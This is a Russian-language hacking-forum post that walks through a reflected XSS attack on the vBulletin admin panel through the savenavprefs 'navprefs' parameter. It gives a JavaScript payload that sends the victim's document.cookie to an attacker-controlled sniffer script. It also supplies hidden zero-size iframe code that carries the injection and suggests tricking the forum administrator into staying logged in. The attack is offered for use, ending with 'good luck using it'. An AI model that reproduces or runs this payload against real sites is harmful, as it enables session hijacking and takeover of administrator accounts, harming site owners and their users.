На данный момент я разобрал только одну пассивную хсс. Вот и хочу объяснить подробнее как работать. Один плюс. Если XSS сработала и он открыл ссылку, то мы можем залесьть в админку, так как сама ХСС находится в админке и он уже в ней... 1. Создаем на своем хостинге файл js.js(пусть будет yousite1.ru/js.js), он выглядит так: Code: img=new Image();img.src="http://Yoursite2.ru/cgi/sniff.cgi?"+document.cookie; , где http://Yoursite2.ru/cgi/sniff.cgi? - ваш сниффер. 2. Вставляем в любой html файл следующий код: Code: <iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0> Где site.ru - сайт, у который ломаем. vbulletin/admincp - =путь до админки Теперь даем ему линк на html страницу и ждем куки=) Примечание1. Сессия у админа,которого вы ломаете может быть и на http://www.site.ru и на http://site.ru просто(без www), поэтому логичнее сделать сразу два варианта, то есть вставлять лучше такой код: Code: <iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0> <iframe src='http://www.site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0> Примечание2. yoursite и yoursite2 могут совпадать, я просто описал, чтобы не путались.... Примечание3. Лучше всего заранее убедиться, что админ зашел в админку...Это можно сделать так: Попросить его что-то поменять у Вас в профиле или поискать багу на сайте(кривой скин и т.д. и попросить его поменять...) Ну в общем множестве вариантов. Удачи в использовании. Разъясню: ---- НАПАДЕНИЕ ОСУЩЕСТВЛЯЕТСЯ ТОЛЬКО НА АДМИНИСТРАТОРА ФОРУМА(ИЛИ ТЕХ КТО ИМЕЕТ ДОСТУП В АДМИН ПАНЕЛЬ) ---- Сессия администратора должна сохраниться(это примерно минут 10-20 после последнего действия в админ панели...). ------------------------------------------------------------------ Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей vBulletin].
